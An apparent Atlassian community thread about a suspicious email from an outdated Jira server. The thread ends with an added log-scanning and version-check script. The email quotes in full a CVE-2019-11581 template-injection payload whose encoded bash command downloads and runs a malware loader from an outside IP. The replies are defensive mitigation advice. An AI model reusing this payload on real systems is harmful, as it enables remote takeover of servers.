
got Weird Email from our JIRA application



Please, can someone advise why we got a weird email from our JIRA application? Our JIRA application version is (v6.0.2#6097-sha1:e270beb). Below is the email message from our JIRA application.


[JIRA] #set ($cmd="bash -c {echo,c2ggLWMgIihjdXJsIC0tdXNlci1hZ2VudCBjdmVfMjAxOV8xMTU4MSBodHRwOi8vMTk0LjE0NS4yMjcuMjEvbGRyLnNofHx3Z2V0IC0tdXNlci1hZ2VudCBjdmVfMjAxOV8xMTU4MSAtcSAtTyAtIGh0dHA6Ly8xOTQuMTQ1LjIyNy4yMS9sZHIuc2gpfHNoIg==}|{base64,-d}|{bash,-i}") #set ($e="exp") #set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd)) #set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a)) #set($sc = $e.getClass().forName("java.util.Scanner")) #set($constructor = $sc.getDeclaredConstructor($e.getClass().forName(""))) #set($scan=$constructor.newInstance($input).useDelimiter("\A")) #if($scan.hasNext()) $ #end




4 answers

2 votes
Daniel Eads Atlassian Team Apr 01, 2021

Hi Michael,

I've looked through the command this string is attempting to execute, and believe the file it tries to download and run is a malware loader. I would advise taking these steps:

  1. Disable the "contact administrators" form in your Jira instance:
    1. Choose Administration > System.
    2. Choose General Configuration.
    3. Click Edit Settings.
    4. Scroll down to the Contact Administrators Form and set it to OFF.
    5. Click Update.
  2. Block the following URLs from being accessed by the internet, if you have a reverse proxy in front of your Jira instance:
    1. /secure/ContactAdministrators
    2. /secure/admin/SendBulkMail!default.jspa
    3. /admin/SendBulkMail!default.jspa
    4. /SendBulkMail!default.jspa
  3. Scan your server for malware
    1. The loader file in your question attempts to move the executable for iptables from /sbin/iptables to /sbin/iptables_ - I would consider the presence of that renamed executable to be proof that the loader script had run and that the server is likely compromised.
  4. Upgrade Jira to a recent version - any version released after July 10, 2019 should contain the fix for this CVE, as described in the security advisory for CVE-2019-11581. Since you are currently on Jira 6.0, you will need to make at least one intermediary upgrade to 7.0 before continuing up to a more recent version of Jira. I would suggest the following upgrade path:
    1. 6.0 (your current version) -> 6.4 -> 7.0 -> 7.6.17 (the last release in 7.6 - which contains the fix for the CVE)
    2. See Upgrading Jira applications for more upgrade information
  5. At this point, I would suggest either considering a Cloud migration - our cloud migration assistant app supports Jira 7.6 and newer - or continuing to upgrade to a more recent version of Jira Server such as Jira 8.13.

Can anyone help with my issue?

Hello Michael,


We received the exact same emails not long ago. We decided to open a ticket on Atlassian support. We believe it is related to and but we are not sure.


Best regards,


Hi Bastien

Could you get a solution for this weird mail?

Hello Ramith,


Atlassian confirmed that if your Jira has been upgraded to a fixed version, this is not a problem.

List of fixed versions:

  • 7.6.14
  • 7.13.5
  • 8.0.3
  • 8.1.2
  • 8.2.3
  • All versions higher than 8.3

Therefore, we were protected but we were definitely under attack.
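
The fixed-version list above and the reverse-proxy step in the first answer can be checked together with a short script. This is an added example, not part of any post in this thread and not Atlassian code. It assumes an Apache/nginx "combined" access log, reads "All versions higher than 8.3" as 8.3.0 and later, and uses constructed sample log lines; the function names are hypothetical.

```python
import re

# Fixed release per branch, copied from the list in the thread.
FIXED = {(7, 6): 14, (7, 13): 5, (8, 0): 3, (8, 1): 2, (8, 2): 3}
FIRST_FIXED_BRANCH = (8, 3)  # assumption: "higher than 8.3" read as 8.3.0 and later

# The four paths from the reverse-proxy step; the three SendBulkMail variants
# share one suffix, and search() also matches behind a context path.
EXPOSED_PATHS = re.compile(
    r"/secure/ContactAdministrators|/SendBulkMail!default\.jspa", re.IGNORECASE)
# Assumed log layout: Apache/nginx "combined" access log.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

def is_fixed(banner):
    """True if a version string such as 'v6.0.2#6097-sha1:...' has the fix."""
    m = re.match(r"v?(\d+)\.(\d+)(?:\.(\d+))?", banner.strip())
    if not m:
        raise ValueError(f"unrecognised version: {banner!r}")
    major, minor, patch = (int(g or 0) for g in m.groups())
    if (major, minor) >= FIRST_FIXED_BRANCH:
        return True
    # Branches absent from the list (6.x, 7.7, ...) have no fixed release,
    # even though 7.7.0 sorts after 7.6.14 in a plain comparison.
    return patch >= FIXED.get((major, minor), float("inf"))

def reachable_hits(lines):
    """Requests to the listed paths that the server did not reject (status < 400)."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m and EXPOSED_PATHS.search(m.group(3)) and int(m.group(4)) < 400:
            hits.append((m.group(1), m.group(2), m.group(3)))
    return hits

# Constructed sample log lines (documentation-range addresses), not from the thread.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Apr/2021:10:00:01 +0000] "POST /secure/ContactAdministrators.jspa HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.7 - - [01/Apr/2021:10:00:05 +0000] "GET /secure/admin/SendBulkMail!default.jspa HTTP/1.1" 403 0 "-" "-"',
    '198.51.100.9 - - [01/Apr/2021:10:01:00 +0000] "GET /secure/Dashboard.jspa HTTP/1.1" 200 9000 "-" "-"',
]

if __name__ == "__main__":
    for v in ("v6.0.2#6097-sha1:e270beb", "7.6.14", "7.7.0", "8.13.0"):
        print(v, "fixed" if is_fixed(v) else "not on a fixed release")
    for hit in reachable_hits(SAMPLE_LOG):
        print("reachable:", *hit)
```

A request that still returns a status below 400 on one of these paths after the proxy rule is in place means the block is not taking effect for that route.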

Hi, can anyone help me with this issue?
